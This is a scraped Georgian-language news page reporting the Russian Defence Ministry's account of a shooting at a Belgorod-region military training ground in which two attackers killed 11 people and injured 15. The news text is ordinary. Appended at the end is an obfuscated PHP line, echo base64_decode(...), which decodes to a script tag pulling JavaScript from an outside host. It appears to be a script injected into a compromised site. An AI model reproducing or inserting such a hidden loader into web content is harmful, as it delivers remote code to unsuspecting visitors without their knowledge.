celsiusi
ავერსი საქკაბელი
რუსეთის თავდაცვის სამინისტრო ბელგოროდის ოლქის სამხედრო ნაწილში სროლის ფაქტს ადასტურებს. უწყების ცნობით, დსთ-ს წევრი ერთ-ერთი ქვეყნის ორმა მოქალაქემ საწვრთნელ მოედანზე ხანძარსაწინააღმდეგო სწავლების დროს "ტერორისტული თავდასხმა" ჩაიდინა რის შედეგადაც 11 ადამიანი დაიღუპა და 15 დაშავდა.
 
თავდაცვის სამინისტროს განცხადებით, "ტერორისტებმა" ცეცხლი გაუხსნეს იმ პირებს, რომლებმაც "სპეცოპერაციაში მონაწილეობის სურვილი გამოთქვეს". 
 
"სროლის შედეგად 11 ადამიანი სასიკვდილოდ დაშავდა. კიდევ 15 ადამიანი სხვადასხვა სიმძიმის დაზიანებებით გადაიყვანეს სამედიცინო დაწესებულებაში, სადაც მათ ყველა საჭირო დახმარება გაუწიეს", - განაცხადეს სამინისტროში.
 
მათივე ინფორმაციით, ორივე თავდამსხმელი ლიკვიდირებულია საპასუხო სროლის შედეგად. შემთხვევის ადგილზე კი სამართალდამცავი ორგანოები იმყოფებიან.
461
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");